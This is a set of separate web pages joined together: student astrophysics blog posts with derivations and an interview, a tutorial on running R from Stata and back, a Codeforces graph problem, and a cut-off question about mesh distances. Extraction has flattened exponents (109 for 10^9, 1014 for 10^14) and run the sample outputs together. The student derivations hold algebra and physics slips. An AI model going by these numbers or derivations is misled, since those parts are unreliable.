$\frac{m_{p}}{m_{*}}=\frac{a_{*}}{a-a_{*}} \\ \\ \frac{m_{p}}{m_{*}}a=(1-\frac{m_{p}}{m_{*}})a_{*} \\ \\ a_{*}=\frac{m_{p}}{m_{p}+m_{*}}a$
$\frac{m_{p}}{m_{*}}=\frac{a-a_{p}}{a_{p}} \\ \\ (\frac{m_p}{m_*}+1)a_p=a \\ \\ a_p=\frac{m_*}{m_p+m_*}a$
Conclusion
We have shown here that star does indeed orbit the centre of mass, just as the planet does. However, looking at these equations carefully, we find that except for very massive planets, the semimajor axis of the star's orbit is roughly zero and the semimajor axis of the planet's orbit is roughly equal to the mean semimajor axis. As a result, we find that we can in fact use the assumptions implicit in Kepler's Law.
# The Death of a Star
Second Authors: Nathan, Lauren
Introduction
We know how stars are formed to a certain extent and that while they are on the main sequence, they are supported by hydrostatic equilibrium. However, when a star moves off the main sequence and can no longer support itself, what happens? We assume that at this point, the core of the sun has converted all of its mass to energy and is now undergoing gravitational collapse.
Methods
We know that the Sun generates energy throughout its lifetime at a rate of:
$L_{\odot }=4 \times 10^{33} erg/s$
Assuming that the sun uses up the entire mass of its core (10% of a solar mass) as it undergoes fusion, and converts energy with 0.7% efficiency, we can determine the total energy it produces in its lifetime with
$E=0.007\Delta mc^{2}=0.007\left ( 2 \times 10^{32}g \right )\left ( 9 \times 10^{20} cm^{2}/s^{2} \right )=1.26 \times 10^{51} ergs$
Dividing this number by the rate of energy production, we can determine the time it takes for the Sun to use all of its mass available for fusion. This time is
$\frac{1.26 \times 10^{51} ergs}{4 \times 10^{33} ergs/s}=3.15 \times 10^{17}s=9.99 \times 10^{9} years$
Now we know the core will collapse, but it won't collapse indefinitely. We find that the core collapses to the point that the interparticle spacing is on the order of the De Broglie wavelength. Since it is easy to see that electrons have greater momentum compared to protons of equal energy, electrons are the first to reach this critical density. We can calculate this using the equations:
$\newline E=\frac{1}{2}m_{e}v^{2}\newline \newline v=\sqrt{\frac{2E}{m_{e}}}\newline \newline \lambda=\frac{h}{mv}=\frac{h}{\sqrt{2Em_{e}}}, \: E = kT$
It is easy to tell that we have one molecule per cubic lambda. So we have:
$N=\left ( \frac{\sqrt{2m_{e}kT}}{h} \right )^{3}$
The actual value is 8 times this, for reasons I can't remember, but Nathan tells me Professor Johnson said the factor of 8 was okay to include in our calculations. So multiplying this by the mass of a hydrogen atom and using T = the temperature of the sun's core, we get density
$\rho = 8\frac{(2m_{e}kT)^{\frac{3}{2}}}{h^{3}}m_{H}\approx 360 \; g/cm^{3}$
Which is more than twice the current maximum density of the sun's core.
Conclusions
We find that by converting 0.7% of the mass of the sun's core into energy, the sun's lifetime is roughly 10 billion years, which agrees with what scientists have predicted. The density of the core after collapse will also be far greater than the current density of the sun's core, which is reasonable or it would not be able to support the sun post-collapse.
# An Interview With an Astrophysicist: The Postdoc
As some readers may know, this past summer I had the privilege of being able to work for Dr. Andy Goulding at the Smithsonian Astrophysical Observatory. Dr. Goulding is a first year Smithsonian Research Fellow in the High Energy Astrophysics division. He did his PhD work in AGN activity at the University of Durham, UK in the fall of 2010 before moving to Boston as a postdoc. Working with him was a wonderful educational experience that I'd happily do over if I had the chance. He gave me a look into the life of a researcher and how much research differs from course work.
We've vaguely kept in touch since September and he generously agreed to answer a few questions on his career for me. Of course, given the title of this blog, the first question was obvious. He took a lot of time in answering these questions, and I definitely learned some new things. For example, I had no idea that there was a difference between a postdoctoral research associate and a fellow.
What is the difference between an astronomer and an astrophysicist at this point in time? Which, if you have a preference, are you?
From a professional point of view, this is really semantics. People have degrees/PhDs in astronomy and/or astrophysics - it depends on institution. However, it is more likely that someone who is an amateur (non-PhD) is considered to be an astronomer. Classically, an astrophysicist attempts to understand and interpret the astronomical observations through application of physics. My PhD is in astrophysics, so in the strictest sense, I am an astrophysicist.
What are your primary areas of research as an astronomer/astrophysicist? How did you get interested in them?
Black hole growth and galaxy evolution. Black hole physics was considered a "popular science" in the 1990s, so when I was younger it was very easy to pick up a book in the local store, and this naturally progressed from a hobby into a profession.
How did you get into astronomy/astrophysics? What did you study as an undergrad? Where did you go to graduate school and why?
As an undergrad I studied Theoretical Physics - this involved particle theory, supersymmetry, advanced quantum theory and general relativity - this had little to do with astronomy, so it does not necessarily follow that your undergrad major must be your graduate major. Despite offers from several graduate schools in the UK, I decided to stay at my undergrad institution, Durham University, as it has a fantastic worldwide reputation as well as the largest astrophysics/cosmology department in the UK.
What precisely is a postdoctoral fellowship? How does it fit in to a career in astronomy/astrophysics?
Once a predoc has completed their PhD, they will generally look for a Post-doctoral position at a different institution - these come in 2 flavors: (1) research associate and (2) fellowship. A research associate position is when a group/faculty has money available to employ a post-doc to carry out their specific research and help pre-doc students within the research group. A fellowship is generally a highly sort-after monetary prize which may or may not be linked with a specific institution and allows the holder to carry out the research of their choice - this is often predicated by the research proposal which is submitted in order to win the fellowship.
How has your career played out? Is it what you expected? What is the typical career arc of an astronomer/astrophysicist?
At this stage, I am not really in a position to answer this question. I completed my PhD in late 2010, and moved to Harvard shortly after to begin my fellowship which I had been accepted for earlier in the year. As I have only been here for a little over 12 months, it is not really possible to answer this question. 'Typically', an astrophysicist will expect to go from grad student (3-6 years) -> post-doc associate (2-3 years) -> [post-doc associate (2-3 years) ->] post-doc fellow (2-3 years) -> [post-doc fellow (2-3 years) ->] associate professor (3-10 years) -> tenured professor (indefinite). N.b., I added the other post-doc positions as some people prefer to stay as post-docs for longer periods of time to help with their publication records to move to the next stage and/or keep their teaching duties lower.
How have your goals evolved over the course of your career, if they have at all?
As I said above, my career is still becoming established. As I skipped the post-doc associate stage, and gained a fellowship on my first position, my current goal (for next year) will be to win a second prize fellowship to further expand my publication record.
My Masters degree is in theoretical physics, many people with this degree become statistical analysts and/or military defense specialists.
What is the best part of being an astronomer/astrophysicist? The worst?
This is quite an interesting question as I'm pretty sure that you will get a different answer from every person. Being an astrophysicist is all about 'puzzle solving', we all have some intrinsic desire to answer the questions which are the most difficult to answer, so when we answer them, or move a step closer to answering them, this is the 'best part of being an astronomer'. However, it can be worst, you can find yourself working on one project for 6 months and then finding out that you have gone down completely the wrong avenue, and you have to start over. Of course, there are certainly perks too - for example, we travel to very exotic places (a lot), telescopes ares not generally in well-populated areas so you get to travel to places like Hawaii, the Canary Islands, Australia, the Atacama desert (Chile).
What can aspiring astronomers/astrophysicists do to make things easier for themselves? i.e., what do you wish you'd known as an undergrad?
Of course, get very high grades and after that, you need something on your cv that will get you noticed (e.g., a summer studentship in a department)
What has been the most difficult stage of your career so far? What have been some notable inspirations along the way?
At this point in time, astrophysics is struggling for funding from the government due to certain projects costing significantly more than was originally budgeted for, as such further funding money which would be relatively easy to propose for 5 years ago is not forth-coming. Hence, much more time must be put into proposing for the next year's projects, and this slows down the current research. This is not necessarily 'difficult' but it is certainly frustrating.
Any final thoughts for the undergraduate astronomy student?
Astronomy as an undergraduate student and astronomy research are nothing alike (as you have already seen, Eric).
# Star Formation: Timescale and Stability
Introduction
Star formation is governed by the collapse of a cloud of particles into a gravitationally bound sphere which we call a star. The radius of the could at which this occurs is called the Jeans Length, where the gravitational force of the cloud overcomes the thermal energy causing it to expand. Here we examine the time scale of such a collapse and also calculate the Jeans Length.
Methods
In order to determine the time it takes for this collapse to occur in terms of the mass and size of the cloud, we consider a cloud of mass M and a test particle a distance away from it. We assume the cloud has a mass given by
$M=\bar{\rho }\frac{4}{3}\pi r^{3}$
where r is the length of the major axis for an elliptical orbit of eccentricity 1. By assuming such a geometry for the free fall, we can initially approximate the orbit to a straight line with a mass M at one end and our test particle at the other. Since this is a free fall, we can also approximate the time tff to be half the orbital period we get from Kepler's 3rd law (a = 1/2 r)
$T^{2}=\frac{4\pi ^{2}a^{3}}{GM}$
Substituting our mass formula into this equation, we get
$t_{ff}=\frac{1}{2}\sqrt{\frac{4 \pi^{2}a^{3}}{G\frac{4}{3}\pi\bar{\rho}\left ( 2a \right )^{3}}}=\sqrt{\frac{3 \pi}{32G\bar{\rho}}}$
The implicit assumptions are that we can even call this half an orbit, as an eccentricity 1 orbit is parabolic and therefore not periodic, and that we can approximate this orbit to a straight line. Now in order to find the Jeans Length, we equate this to the dynamical time, or the time it takes a sound wave to cross this distance. Let's define this as
$t_{dyn}=\frac{r}{c_{s}}$
Equating the two, we get the radius at which the cloud will undergo gravitational collapse
$r=\sqrt{\frac{3\pi c_{s}^{2}}{32G\bar{\rho}}}$
For an isothermal gas of constant density, this length signifies the minimum radius at which it will continue to be a gas and not collapse into a much denser formation. This is the Jeans Length to an order of magnitude. The actual formula for the Jeans Length is
$R_{J}=\sqrt{\frac{\pi c_{s}^{2}}{G\bar{\rho }}}$
Conclusions
We have hear calculated the free fall time for star formation as well as the radius at which the gravitational force between interstellar dust particles takes over. It is important to note that since the density is radius dependent, the Jeans Length is not constant for all star forming clouds, but varies even with the change of radius due to collapse and we have
$R_{J}\propto r^{\frac{3}{2}}$
If we consider a cloud that starts out at the Jeans Length for its particular conditions, by the time it reaches half this radius the Jeans Length has decreased by a factor of √8. As a result, the initial Jeans Length may actually govern how far the cloud will collapse for a given mass and radius.
# Becoming An Astronomer
We were recently, or not so recently—I'm very good at procrastinating—assigned a multi-part blogging to find out what it truly means to be an astronomer. I realise as a sophomore astrophysics major that I still don't understand the specifics of what being an astronomer entails or means to me. To quote my friend Alexa,
I just want to be one. So much. “Space” is, if you think about it, everything but Earth. When we study it, we’re pausing our narcissistic tendencies for just a moment. We’re not everything; we’re part of everything. Ignoring that is shameful.
She stated in the best way possible what attracts me to astronomy, but that still doesn't mean I know what astronomy is. Right now I just think of astronomy as some nebulous loosely defined field of Things I Would Like To Do Because They Are Amazing, but that's not an acceptable answer to the question. So without further delay I shall attempt to synthesise my thoughts on the topic.
The point of being a professional astronomer, in my experience, is to contribute understanding of what the universe is, how it is structured, how it came to be, and what its future might hold. Most likely this is because the first astronomer I ever met was a professor of cosmology. I've come to accept that he's probably the reason my main research interest tends to observational cosmology. Of course, this is a very broad and relatively unhelpful answer to the astronomer question. Sure, that's the intention, but how do we get there?
I think it's safe to assume that the journey to becoming a professional astronomer begins as an undergrad, or if you're very lucky, as a high school student. I think mine was a bit of both, as I did get the opportunity as a junior to do some busy work for he of blog title fame. But that was a week long, and although it was some exposure I doubt it's how careers in astronomy start. Careers in astronomy, at least for a Caltech student, probably start with a SURF fellowship. I know SURF was my first real look at what an astronomer does. I sat alone in an office 8-9 hours a day, writing code in a language I'd never seen before to analyse data I didn't understand, and I had fun doing it. I think that enjoyment that's what sets the astronomer apart from the average person.
Then the natural course of things is to go to graduate school. This is where you decide What You Want To Do With Your Life. As far as I know, you don't have to decide right away. Unless you're in the UK in which case you need to know what you want to study before you've learnt anything about it. At least, that is what my SURF mentor who is English tells me. Being a grad student requires doing semi-independent research under the guidance of a faculty member who works on a similar topic. You'll probably start to hate your field at some point during this process, but hopefully you'll get over it soon. Next is the postdoctoral fellow. I have no idea what a postdoc does. Don't tell my SURF mentor that because he is one.
I believe your career options then become a) professor at an academic institution, b) research scientist some place like the SAO, or c) finance. I'm sure there are more options, I'm just uneducated in that side of things. The first two options strike me as pretty similar except the professor track astronomer will probably have to teach at some point or another. This part is where you get to move on to independent research in topics that interest you. You might find out something that only you know about, and that's a rewarding experience. Although any work in astronomy is rewarding if it's what's truly exciting and inspirational to you.
I have given my impression of what it takes to become an astronomer. So once again, we're back to the question of what does it mean to me to be an astronomer? It's going to take a lot of work. Astronomy, as it turns out, is hard. But the work will be worthwhile because I'll be learning how the universe works, or how we think the universe works. Maybe I'll end up amending some of that knowledge. Who knows? Being an astronomer means getting excited about the mysteries of space and our tiny place in it. It means realising how small we really are in the grand scheme of things, accepting that, and moving on to understand why. Most of all, it means that when your friend starts talking about M83 and means the band, this is all you can see.
# Is There Life On Maaaars?
I've been having an uncharacteristic moment of curiosity lately, and that curiosity is about life outside Earth. Usually I don't care. I'm much more of a "let's explore and discover the physical laws of the universe" kind of guy. But today, it's all about life out there, and why not? Some pretty interesting things have happened in the last week.
1. ESA's Mars500 Simulation Ended
So I have to admit, I knew nothing about this project until I read the article today. Doesn't prevent me from thinking it's amazing. In short, a crew of 6 was stuck together in an in-lab "spacecraft" for 17 months, performing the tasks necessary for a real mission to Mars including "entering" orbit and "landing" on Mars. Conditions were controlled exactly as if they were actually travelling and they completed experiments on the problems brought about by long space missions. Maybe this will open up opportunities for an actual space mission to Mars after studying the physiological and psychological effects of longterm isolation. Very cool. Here is a compiled video diary of their time during the simulation:
2. A New Way to Look for Aliens
Avi Loeb and Edwin Turner of the Harvard-Smithsonian Center for Astrophysics and Princeton University, respectively have suggested a new way to look for extraterrestrial intelligence: doing it the same way we find civilisation on earth. They intend to look for the lights from their cities. These two operate on the assumption that life evolves in the light of the nearest star and that any intelligent life forms would have learned to make light and extend their days. They would have to find a way to filter out the light from the star. They suggest that one method of doing this is to look for bright areas in a dark phase of the planet's orbit (think of the dark side of the moon). Unfortunately, this method would require far more powerful telescopes than we now have, but it's definitely a start.
3. Organic Molecule "Sweet Spots"
This isn't technically, astrophysics, however I think it still has a place in a post about life outside Earth. Astrobiologists at Rensselaer (one of the reasons I didn't apply there was I couldn't spell it on the first try) have discovered areas of higher methanol concentration surrounding some, but not all, newly formed stars. Methanol is apparently one of the precursors to more complex organic molecules which may give rise to life. They call this a "sweet spot" of physical conditions that allow these organic molecules to form. Even more interestingly, from studying concentrations in comets, they have determined that our solar system is painfully average in the methanol department. In other words, we're not all that special and life still managed to appear on earth. The implication here is there may be other solar systems out there with greater methanol concentrations that lend themselves more easily to the appearance of life than our own!
Sources
http://www.sciencedaily.com/releases/2011/11/111106142036.htm
http://www.esa.int/SPECIALS/Mars500/
http://www.sciencedaily.com/releases/2011/11/111103190356.htm
http://www.sciencedaily.com/releases/2011/11/111102190028.htm
# Hydrostatic Equilibrium and the Sun
Abstract
We would like to know how the sun is being "supported". We assume that this mechanism is hydrostatic equilibrium, but to be sure we work through the derivation.
Introduction
We know that the sun is somehow being prevented from gravitational contraction. Our theory is that it is supported by hydrostatic equilibrium, which means that the internal pressure provides an opposing support force. We calculate the gravitational force on a mass shell, the pressure required to balance it, and then derive the force equation for hydrostatic equilibrium.
Methods and Results
We first assume the Sun to be a spherical gas cloud with density ρ(r). We consider a differential mass shell of this sphere with radius r. We recall that the volume of a sphere is 4/3πr3 and that the differential volume is its derivative. Then we get a differential mass dM:
$dM=\rho \left ( r \right )4\pi r^{2}dr$
We know the equation for universal gravitation:
$F=-\frac{GMm}{r^{2}}$
Here we let M be the total mass enclosed by the mass shell and m be the differential mass element. As a result, we get the differential gravitational force to be:
$dF_{g}=-\frac{GM\left ( r \right )\rho \left ( r \right )4\pi r^{2}dr}{r^{2}}=-GM\left ( r \right )\rho \left ( r \right )4\pi dr$
We know that pressure is equal to force divided by area. So we can say:
$dP\left ( r \right )=\frac{dF_{g}}{A}=-\frac{GM\left ( r \right )\rho \left ( r \right )4\pi dr}{4\pi r^{2}}=-\frac{GM\left ( r \right )\rho \left ( r \right )dr}{r^{2}}$
Now dividing by dr on both sides of the equation we arrive at the equation of hydrostatic equilibrium:
$\frac{dP(r)}{dr}=-\frac{GM(r)\rho (r)}{r^{2}}$
Conclusions
We have derived from simple physical laws that the equation for hydrostatic equilibrium is a plausible explanation for the way the sun is supported. A quick search shows that we are indeed correct. Hooray! | 2018-02-19 07:51:33 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 22, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5444417595863342, "perplexity": 891.7318954089162}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-09/segments/1518891812556.20/warc/CC-MAIN-20180219072328-20180219092328-00321.warc.gz"} |
https://fsolt.org/blog/2018/08/15/switch-to-r/ | ### How to Switch Your Workflow from Stata to R, One Bit at a Time
Wednesday, 15 August 2018
A recent exchange on Twitter reminded me of my switch to R from Stata. I’d started grad school in 1999, before R hit 1.0.0, so I’d been trained exclusively in Stata. By 2008, I had way more than the proverbial 10,000 in-seat hours in Stata, and I knew all the tricks to make it do just what I wanted. I was even Stata Corp.’s on-campus rep at my university. Still, I’d started dabbling in R. Then as now, there were specific things R could do that Stata couldn’t.1 But how to get those advantages without throwing out my hard-earned skills and starting over as a complete n00b? The answer was: a little bit at a time.
Fortunately, it’s not difficult to switch back and forth within a given project, so you can start bringing some R to your Stata-based workflow while leaving it mostly intact. Then, if and when you find yourself doing more in R than in Stata, you can flip and start using Stata from within R.
So, install R and let’s get you started.
## Running R from Stata
The trick to running R from within your do-file is first to save the data you want to pass to R, then call the .R file with the commands you want to run in R (the “R script”), then—if necessary—reload the R output into Stata.
While it’s also possible to use Stata’s shell command to run an R script (for illustrative purposes, let’s pretend it’s called my_script.R), Roger Newson’s rsource module makes it particularly easy. Install it as follows:
ssc install rsource, replace
Unfortunately, the information rsource needs about your R installation is a bit different depending on your OS, but once installed, adding this platform-independent code to your do-file will run the script:
if "c(os)'"=="MacOSX" | "c(os)'"=="UNIX" {
rsource using my_script.R, rpath("/usr/local/bin/R") roptions("--vanilla"')
}
else { // windows
rsource using my_script.R, rpath("c:\r\R-3.5.1\bin\Rterm.exe"') roptions("--vanilla"') // change version number, if necessary
}
Of course, you could choose to skip the whole if-else and just include the line that runs on your machine, but that’s not doing any favors to your collaborators or anyone else trying to reproduce your results. You might also just prefer to specify the rpath and roptions in your profile do-file,2 but again, then you’ll need to let others know to do the same or they won’t be able to run your do-file.
Note, too, that if you don’t have much R code to run, it might be easiest to just keep it in your do-file rather than using a separate script. You can do this using the terminator option to rsource, though a downside to this approach is that it doesn’t allow you to if-else the rsource command by your OS. In the do-file below, I also use the regsave module to save my results to pass them to R; install it using ssc install regsave, replace.
clear
set more off
sysuse auto, clear
gen wt = weight/1000
regress mpg wt displacement foreign trunk headroom length
regsave using "~/Desktop/R_Stata/auto_results.dta", replace
rsource, terminator(END_OF_R) rpath("/usr/local/bin/R") roptions("--vanilla"')
// rsource using my_script.R, rpath("c:\r\R-3.5.1\bin\Rterm.exe"') roptions("--vanilla"') // use this line instead if you run a windows box
library(tidyverse); # collection of all-around useful R packages
library(haven); # for importing Stata datasets
library(dotwhisker); # easy and beautiful regression plots, imho
rename(term = var,
estimate = coef,
std.error = stderr) %>%
filter(term != "_cons");
dwplot(auto_results);
ggsave("~/Desktop/R_Stata/auto_results.png", width = 5, height = 4);
END_OF_R
## Running Stata from R
So maybe you’ve gotten to the point where you spend more of your time in R than in Stata, but there’s still a few parts of your work that you just want (or need!) to keep in Stata. Running a do-file (my_do_file.do) from inside your R script is easy with Luca Braglia’s RStata package:
if (!require(RStata)) install.packages("RStata"); library(RStata) # this will install RStata if not already installed
stata("my_do_file.do",
stata.path = "/Applications/Stata/StataMP.app/Contents/MacOS/stata-mp", # yours probably differs: use the chooseStataBin() command on windows or linux machines; on Macs, right click on the Stata app, select "Show Package Contents", then see what's in the Contents/MacOS/ directory
stata.version = 13) # again, specify what _you_ have
On this side as well, it’s possible to set the arguments just once, in your .Rprofile file. In my case, these two lines do the trick:
options("RStata.StataPath" = "/Applications/Stata/StataMP.app/Contents/MacOS/stata-mp")
options("RStata.StataVersion" = 13)
Since Stata isn’t free and open-source, it’s even more likely that others will have different setups anyway, so this may make the most sense. Be sure to comment your code to clue people in, though.
If you just want to use a single Stata command RStata::stata3 will do that for you, too, with no need for a do-file. From the RStata package documentation:
library("RStata")
# remember to set RStata.StataPath & RStata.StataVersion in your .Rprofile first! See https://www.rdocumentation.org/packages/RStata/
## Data input to Stata
x <- data.frame(a = rnorm(3), b = letters[1:3])
stata("sum a", data.in = x)
## . sum a
##
## Variable | Obs Mean Std. Dev. Min Max
## -------------+--------------------------------------------------------
## a | 3 .0157619 .6048126 -.3437544 .7140365
## Data output from Stata (e.g., obtain 'auto' dataset)
auto <- stata("sysuse auto", data.out = TRUE)
## . sysuse auto
## (1978 Automobile Data)
head(auto)
## make price mpg rep78 headroom trunk weight length turn
## 1 AMC Concord 4099 22 3 2.5 11 2930 186 40
## 2 AMC Pacer 4749 17 3 3.0 11 3350 173 40
## 3 AMC Spirit 3799 22 NA 3.0 12 2640 168 35
## 4 Buick Century 4816 20 3 4.5 16 3250 196 40
## 5 Buick Electra 7827 15 4 4.0 20 4080 222 43
## 6 Buick LeSabre 5788 18 3 4.0 21 3670 218 43
## displacement gear_ratio foreign
## 1 121 3.58 Domestic
## 2 258 2.53 Domestic
## 3 121 3.08 Domestic
## 4 196 2.93 Domestic
## 5 350 2.41 Domestic
## 6 231 2.73 Domestic
## Data input/output
(y <- stata("replace a = 2", data.in = x, data.out = TRUE))
## . replace a = 2
## (3 real changes made)
## a b
## 1 2 a
## 2 2 b
## 3 2 c
And you can embed several Stata commands in your R code as well:
data <- data.frame(y = rnorm(100), x1 = rnorm(100), x2 = rnorm(100))
stata("
sum y x1 x2
reg y x1 x2
", data.in = data)
## .
## . sum y x1 x2
##
## Variable | Obs Mean Std. Dev. Min Max
## -------------+--------------------------------------------------------
## y | 100 -.2265245 .9279628 -2.140921 3.456609
## x1 | 100 .0235107 .9654566 -2.089315 2.085599
## x2 | 100 -.1990955 1.054259 -2.800112 1.768455
## . reg y x1 x2
##
## Source | SS df MS Number of obs = 100
## -------------+------------------------------ F( 2, 97) = 1.25
## Model | 2.14131244 2 1.07065622 Prob > F = 0.2912
## Residual | 83.1090619 97 .856794452 R-squared = 0.0251
## -------------+------------------------------ Adj R-squared = 0.0050
## Total | 85.2503743 99 .861114892 Root MSE = .92563
##
## ------------------------------------------------------------------------------
## y | Coef. Std. Err. t P>|t| [95% Conf. Interval]
## -------------+----------------------------------------------------------------
## x1 | -.0224969 .0970207 -0.23 0.817 -.2150562 .1700624
## x2 | .1403954 .0888485 1.58 0.117 -.0359443 .316735
## _cons | -.1980435 .0943158 -2.10 0.038 -.3852343 -.0108527
## ------------------------------------------------------------------------------
## .
## Summing Up
Moving parts of your work from Stata to R is totally feasible. Lots of people (for example, in the thread that touched this post off, Steve Rodgers) really want to take advantage of the superior graphics capabilities of R, especially the ggplot ecosystem, even while sticking to Stata for most of their work. Once your feet are wet, you may then decide R’s many other benefits (the free part, the super-helpful community, the transferable job skills you can teach your students, the free part, the cutting-edge stuff available years before it’s in Stata, the way RStudio makes it dead easy to do reproducible research through dynamic documents and version control, and, once again, the free part) make switching over all the way to be worth the additional marginal effort. Or you may not.
I completed the transition in three or four years, at my own pace: when I felt comfortable moving another chunk of my workflow over to R, I did, but not before. If I were doing it over right now, with the tidyverse packages dramatically reducing the slope of the learning curve, I might move faster, but there’s no rush, really. Do what works for you.
• This post by John Ricco describing how to translate Stata data cleaning commands to the dplyr idiom will likely be helpful to those new to tidyverse-style R and wanting to move quickly.
• Matthieu Gomez’s R for Stata Users is a more detailed phrasebook that will also be useful to new switchers (H/T Arthur Yip).4
• I also ran across the Rcall package while writing this up, but I haven’t tried it. You may find it useful.
• OTOH, these 2010 slides by Oscar Torres-Reyna were definitely useful to me back in the day, but as they pre-date both the tidyverse and RStudio—the wonders of which really cannot be overstated—they’re now more likely to cause you unnecessary confusion than help you if you’re a new switcher. Better to steer clear.
• Great complete treatments on how to do stuff in R:
• RStudio’s Cheat Sheets are also great references.
• When you’re ready to take the step to using R more than Stata, you’ll want to get fully set up on RStudio, which provides a front end for running R and can integrate with git and GitHub for version control (you will want this). The best resource that I’ve found for this process is Jenny Bryan’s Happy Git and GitHub for the UseR.
• The R community on StackOverflow is full of helpful people. As your Google-fu develops, you’ll find that links to StackOverflow are most likely to get you where you need to go.
• There are so many fantastic #rstats (dozens? hundreds?) follows on Twitter. With apologies to the—seriously—hundreds of others who’ve taught me tons of stuff over the years, I’m going to grit my teeth and rec just five to get you started: Mara Averick, Jenny Bryan, David Robinson, Julia Silge, and Hadley Wickham.
## References
Bryan, Jenny. 2018. “Happy Git and Github for the useR.” http://happygitwithr.com/.
Chang, Winston. “Cookbook for R.” http://www.cookbook-r.com.
Ismay, Chester, and Albert Y. Kim. 2018. “Modern Dive: An Introduction to Statistical and Data Sciences via R.” https://moderndive.com/.
Kastellec, Jonathan P., and Eduardo L. Leoni. 2007. “Using Graphs Instead of Tables in Political Science.” Perspectives on Politics 5(4): 755–71.
Wickham, Hadley, and Garrett Grolemund. 2017. R for Data Science. O’Reilly. http://r4ds.had.co.nz.
1. Then, for me, it was multiple imputation, parallel computation, and the dot-and-whisker plots of regression coefficients introduced to political science by Kastellec and Lioni (2007). On this last one, see also the dotwhisker package. Now my list is different, but even longer. That’s not what I want to get into in this post, though. This post is how, not why.
2. See the technical note to the help file for rsource for details.
3. In the argot (heh), this means the stata command in the RStata package.
4. Arthur also recommends vikjam’s Mostly Harmless Replication, which replicates most of the figures and tables of Mostly Harmless Econometrics in both Stata and R (and many in Python and Julia as well). Though not intended as a guide for switchers, the site will be helpful to fans of the book looking for ways to implement its advice in R. | 2019-12-14 04:55:23 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2430078536272049, "perplexity": 5990.224043637496}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-51/segments/1575540584491.89/warc/CC-MAIN-20191214042241-20191214070241-00326.warc.gz"} |
http://codeforces.com/problemset/problem/916/C | C. Jamie and Interesting Graph
time limit per test
2 seconds
memory limit per test
256 megabytes
input
standard input
output
standard output
Jamie has recently found undirected weighted graphs with the following properties very interesting:
• The graph is connected and contains exactly n vertices and m edges.
• All edge weights are integers and are in range [1, 109] inclusive.
• The length of shortest path from 1 to n is a prime number.
• The sum of edges' weights in the minimum spanning tree (MST) of the graph is a prime number.
• The graph contains no loops or multi-edges.
If you are not familiar with some terms from the statement you can find definitions of them in notes section.
Help Jamie construct any graph with given number of vertices and edges that is interesting!
Input
First line of input contains 2 integers n, m — the required number of vertices and edges.
Output
In the first line output 2 integers sp, mstw (1 ≤ sp, mstw ≤ 1014) — the length of the shortest path and the sum of edges' weights in the minimum spanning tree.
In the next m lines output the edges of the graph. In each line output 3 integers u, v, w (1 ≤ u, v ≤ n, 1 ≤ w ≤ 109) describing the edge connecting u and v and having weight w.
Examples
Input
4 4
Output
7 71 2 32 3 23 4 22 4 4
Input
5 4
Output
7 131 2 21 3 41 4 34 5 4
Note
The graph of sample 1: Shortest path sequence: {1, 2, 3, 4}. MST edges are marked with an asterisk (*).
Definition of terms used in the problem statement:
A shortest path in an undirected graph is a sequence of vertices (v1, v2, ... , vk) such that vi is adjacent to vi + 1 1 ≤ i < k and the sum of weight is minimized where w(i, j) is the edge weight between i and j. (https://en.wikipedia.org/wiki/Shortest_path_problem)
A prime number is a natural number greater than 1 that has no positive divisors other than 1 and itself. (https://en.wikipedia.org/wiki/Prime_number)
A minimum spanning tree (MST) is a subset of the edges of a connected, edge-weighted undirected graph that connects all the vertices together, without any cycles and with the minimum possible total edge weight. (https://en.wikipedia.org/wiki/Minimum_spanning_tree)
https://en.wikipedia.org/wiki/Multiple_edges | 2018-05-27 23:23:02 | {"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3739672005176544, "perplexity": 375.919430460453}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-22/segments/1526794870497.66/warc/CC-MAIN-20180527225404-20180528005404-00364.warc.gz"} |
https://askdev.io/questions/53970/r-dimensional-mesh-inquiry | # r - dimensional mesh inquiry
I am attempting to compute the ordinary range in between any kind of 2 nodes in an $r$ - dimensional mesh.
This is a $3$ - dimensional mesh with $n=3$
